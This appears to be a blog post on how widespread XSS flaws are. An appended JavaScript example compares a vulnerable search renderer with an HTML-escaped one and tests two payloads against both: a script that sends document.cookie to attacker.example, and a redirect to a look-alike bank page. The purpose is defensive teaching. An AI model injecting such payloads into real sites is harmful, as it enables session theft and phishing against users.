
.: Another Day, Another XSS

So many, in fact, that there is a dedicated website to list them. According to its stats, there are currently 14229 vulnerable sites posted (and only 467 of them fixed).

Want to see how many Australian government websites are vulnerable?
How about the American military? Or banks?

Of course, it is important to keep in mind that XSS poses no direct threat to the server itself, only to the clients that access it. If the site uses cookie-based session authentication, however, it opens a whole new can of worms: script injected into the page runs in the victim's browser under the site's own origin, so it can read the session cookie (unless the cookie was set with the HttpOnly flag) or simply issue requests that carry the victim's credentials. Either way the account can be hijacked (taking over the user's identity, transferring funds), and if the hijacked account belongs to an administrator this may escalate to server compromise. In any case it poses significant risk to an organisation.

The other use for XSS is against reputable websites: a real bank's page carrying injected code that redirects the client to a fake phishing copy of the bank instead, or that simply loads a rogue site hosting browser-based remote exploits. The link the victim clicks really does point at the bank's own domain, which is what makes this far more convincing than an ordinary phishing email.
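To make the two preceding paragraphs concrete (cookie theft and the phishing redirect), here is an added example that is not code from the original post. It models the smallest possible reflected-XSS sink, a search page that concatenates the query straight into its HTML, beside the same page with HTML encoding applied, and runs the two payload classes described above through both. The page markup, the parameter name and the attacker hostnames are constructed for the example; the payloads are illustrative rather than taken from any real site.

```javascript
// Added example (not the post's own code). Models a reflected-XSS sink and the
// two payload classes the post describes. All names and hosts are hypothetical.

// Vulnerable: the query parameter is concatenated straight into the HTML.
function renderSearchVulnerable(query) {
  return '<p>Results for: ' + query + '</p>';
}

// Encode the five characters that can change meaning in an HTML text context.
// Note: this is the correct encoding for element text only; an attribute value
// or a JavaScript string context needs its own, different encoding.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same page, but untrusted input is encoded before it reaches the markup.
function renderSearchSafe(query) {
  return '<p>Results for: ' + escapeHtml(query) + '</p>';
}

// Payload 1 (constructed): exfiltrate the session cookie to an attacker host.
// Only works when the session cookie is readable by script, i.e. it was set
// without the HttpOnly flag; the request itself rides on an image load.
const COOKIE_THEFT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Payload 2 (constructed): bounce the victim from the genuine site to a
// look-alike phishing page (or a page hosting browser exploits).
const PHISHING_REDIRECT_PAYLOAD =
  '<script>location.replace("https://bank-login.example/")</script>';

// Check whether the rendered page still contains an executable <script> tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run both payloads through both renderers and report what survives.
function demo() {
  return {
    cookieTheft: {
      vulnerable: containsScriptTag(renderSearchVulnerable(COOKIE_THEFT_PAYLOAD)),
      hardened: containsScriptTag(renderSearchSafe(COOKIE_THEFT_PAYLOAD)),
    },
    phishingRedirect: {
      vulnerable: containsScriptTag(renderSearchVulnerable(PHISHING_REDIRECT_PAYLOAD)),
      hardened: containsScriptTag(renderSearchSafe(PHISHING_REDIRECT_PAYLOAD)),
    },
    hardenedOutput: renderSearchSafe(PHISHING_REDIRECT_PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The vulnerable renderer returns both payloads as live script; the hardened one returns them as inert text such as `&lt;script&gt;...`. Output encoding fixes the injection itself; marking the session cookie `HttpOnly` (and `Secure`) is the separate, defence-in-depth measure that stops the first payload from reading `document.cookie` even where an XSS slips through, though it does nothing against script that simply makes requests as the victim.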
